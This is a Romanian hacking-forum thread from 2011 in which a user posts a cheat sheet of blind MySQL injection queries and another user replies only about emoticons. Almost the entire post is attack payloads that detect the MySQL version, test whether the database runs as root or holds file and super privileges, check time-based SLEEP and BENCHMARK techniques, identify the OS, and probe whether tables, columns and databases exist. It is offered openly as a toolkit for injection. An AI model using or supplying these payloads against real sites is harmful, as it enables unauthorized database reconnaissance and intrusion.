Mecanik Posted December 7, 2011 Report Share Posted December 7, 2011 (edited) /*Din nou daca nu este locul potrivit pentru acest post,rog un admin sa il mute la locul corespunzator./*Salvati aceasta lista! Este esential sa ai toate aceste functii intr-un singur loc!Aveti Nevoie de putina engleza din nou:[fara engleza,nu poti face MySqlInject ] A couple of useful blind queries to fingerprint the database. All of these return either True or False, as in, you either get a result or you don't.Version:SELECT * FROM foo.bar WHERE id=1 AND ASCII(SUBSTR(VERSION(),1,1))=53; #MySQL 5SELECT * FROM foo.bar WHERE id=1 AND ASCII(SUBSTR(VERSION(),1,1))=52; #MySQL 4Running as root:SELECT * FROM foo.bar WHERE id=1 AND IF((SELECT SUBSTR(USER(),1,4))=UNHEX(HEX(0x726F6F74)),1,0)=1Got File_priv:SELECT * FROM foo.bar WHERE id=1 AND IF((SELECT File_priv FROM mysql.user WHERE(CONCAT_WS(CHAR(64),User,Host) LIKE USER()) OR(CONCAT(User,UNHEX(HEX(0x4025))) LIKE USER()) OR(CONCAT_WS(CHAR(64),User,Host) LIKE CONCAT(SUBSTR(USER(),1,INSTR(USER(),CHAR(64))),CHAR(37)))LIMIT 0,1)=CHAR(89),1,0)=1Got Super_priv (Are we DBA):SELECT * FROM foo.bar WHERE id=1 AND IF((SELECT Super_priv FROM mysql.user WHERE(CONCAT_WS(CHAR(64),User,Host) LIKE USER()) OR(CONCAT(User,UNHEX(HEX(0x4025))) LIKE USER()) OR(CONCAT_WS(CHAR(64),User,Host) LIKE CONCAT(SUBSTR(USER(),1,INSTR(USER(),CHAR(64))),CHAR(37)))LIMIT 0,1)=CHAR(89),1,0)=1Can MySQL Sleep:#This query will return True and should take above 1 second to execute. If it's a success.SELECT * FROM foo.bar WHERE id=1 AND IF((SELECT SLEEP(1))=0,1,0)=1Can MySQL Benchmark:SELECT * FROM foo.bar WHERE id=1 AND IF(BENCHMARK(1,MD5(0))=0,1,0)=1Are we on *NIX:SELECT * FROM foo.bar WHERE id=1 AND ASCII(SUBSTR(@@datadir,1,1))=47Are we on Windows:SELECT * FROM foo.bar WHERE id=1 AND IF(ASCII(SUBSTR(@@datadir,2,1))=58,1,0)=1Do a certain column exist:SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(column_name) FROM information_schema.columns WHERE column_name LIKE 'your_column' LIMIT 0,1)>0Do a certain table exist:SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(table_name) FROM information_schema.columns WHERE table_name LIKE 'your_table' LIMIT 0,1)>0SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(table_name) FROM information_schema.tables WHERE table_name LIKE 'your_table' LIMIT 0,1)>0Do a certain database exist:SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(table_schema) FROM information_schema.columns WHERE table_schema LIKE 'your_database' LIMIT 0,1)>0SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(table_schema) FROM information_schema.tables WHERE table_schema LIKE 'your_database' LIMIT 0,1)>0SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(schema_name) FROM information_schema.schemata WHERE schema_name LIKE 'your_database' LIMIT 0,1)>0SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(db) FROM mysql.db WHERE db LIKE 'your_database' LIMIT 0,1)>0 Edited December 7, 2011 by Nytro Quote Link to comment Share on other sites More sharing options...
SticKyWoX Posted December 7, 2011 Report Share Posted December 7, 2011 Dai un disable la emoticons in post. Quote Link to comment Share on other sites More sharing options...